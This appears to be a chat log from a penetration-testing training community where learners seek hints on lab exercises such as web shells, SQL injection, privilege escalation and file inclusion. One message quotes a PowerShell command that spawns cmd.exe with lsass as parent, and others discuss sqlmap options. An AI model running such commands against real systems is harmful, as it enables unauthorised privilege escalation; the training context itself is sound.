Trying to do the questions in module "Shells & Payloads" ==> "Web Shells" ==> "PHP Web Shells" but the rConfig application keeps crashing each time I access another link than Dashboard.php. Tried resetting the target twice, still not working.
Is there an outage/stability issues?

neat badger
storm elk
#

It's clearly mentioned what you need to do before you can message elsewhere

late junco
#

Im stuck at this question in Linux Privilege Escalation module in Environment Enumeration section. Any help would be appreciated

karmic prairie
worldly roost
#

Hey everyone, i am a pentester and now trying to explore AI security (Chatbots and LLMs Security), I just started AI red teamer path, but it is too confusing, can someone guide me or someone wanna collaborate with me so that we can learn the path together.

sleek sentinel
#

I tried this command but nothing happen

autumn pilot
#

from which section is that

sleek sentinel
#

Web request

autumn pilot
#

Okay, that's the module's name

#

What about the section

sleek sentinel
#

HyperText Transfer Protocol (HTTP)

autumn pilot
#

If you run the command you shared earlier, then you will get the answer to the exercise

sleek sentinel
#

I ran it but it didn't return anything and when I add an option for example -o, It says you need to specify url

autumn pilot
#

Use the verbose option to see if you can talk to the target

sleek sentinel
#

I feel stupid sorry for these questions

autumn pilot
#

It is in the form of HTB{s0m3_Text}

karmic prairie
#

Hi everyone, I'm working on the Skills Assessment - SQL Injection Fundamentals. I've discovered the injection point is the invitation code, but I can't get the result using SQLMAP. I've used --risk 3 -- level 5, --random-agent, and --tamper=space2comment, but nothing works. If anyone has done this before, please guide me and give me the command that can inject the result so I can study it. Thank you.😭\

quiet halo
#

im going through the password attack module and trying to install dislocker

#

when doing a apt update or upgrade I get this - not sure if it's just me or common problem

final kite
#

this command more precisely = .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").Id, "C:\Windows\System32\cmd.exe", "")

#

nvm figured it out

#

it was script updated so different command used

prisma pumice
#

Hi all! I stuck on "Attacking Common Applications - osTicket" question. Can someone give me a clue, please?

frosty crescent
worthy sorrel
prisma pumice
# worthy sorrel What Is the question

Question: "Find your way into the osTicket instance and submit the password sent from the Customer Support Agent to the customer Charles Smithson" no additional data provided.

karmic prairie
worthy sorrel
worthy sorrel
#

Sqlmap has whole another section

rich obsidian
#

Just double checking, tier 0 modules are okay to share answers for? I finished the stack-based buffer overflow module for Windows x86 , and I want to post the code I wrote for the skills assessment to my github. There will be a README.md describing its function etc. This will not make me persona non grata correct?

prisma pumice
worthy sorrel
worthy sorrel
#

Yes it is not correct endpoint

prisma pumice
unique field
#

hello @gravitv can i DM you ?

worthy sorrel
unique field
worthy sorrel
unique field
prisma pumice
worthy sorrel
worthy sorrel
unique field
worthy sorrel
#

And you actually don’t require mc if you are matching all of them here

unique field
worthy sorrel
#

I don’t know if i can share but try most common one for Linux

worthy sorrel
late junco
frosty crescent
#

like all challenges

late junco
frosty crescent
limpid hemlock
#

hey can someone help me with the intro to evasion module the section LOLBAS: InstallUtil im stuck there

acoustic owl
#

@pine cave This is not the server for such requests.
Please read #rules.

worthy sorrel
#

There are some switches of grep which can help

karmic prairie
#

I still can't pass the Skills Assessment - SQL Injection Fundamentals. Is there a document I can refer to? If it complies with the rules, thank you.

#

I can't build the payload

worthy sorrel
karmic prairie
#

NO

#

I tried to bypass the registration tonight and register the user to enter the background, but failed

worthy sorrel
#

Just apply the method you have learn in first sql injection section like how to bypass login page

#

Code is invalid means value is false how can you make it true

errant temple
#

Sup everyone

karmic prairie
#

OK, I'll try again, thank you for your help

worthy sorrel
#

There is very generic payload whenever we try to do sql we first inject that payload

karmic prairie
#

OK,thanks!

worthy sorrel
#

Lmk if you found it and got it

karmic prairie
#

I came in, I was trying to inject data before, thank you for giving me the direction

#

I'm already backstage

worthy sorrel
winter schooner
#

Can anyone give me hint for sql injection fundementals skills assessment

winter schooner
tawny pollen
#

hey guys! is there any module about cryptography?

haughty fiber
#

Stuck in File Inclusion skill assessment. Absolutely cannot find any vulnerable parameters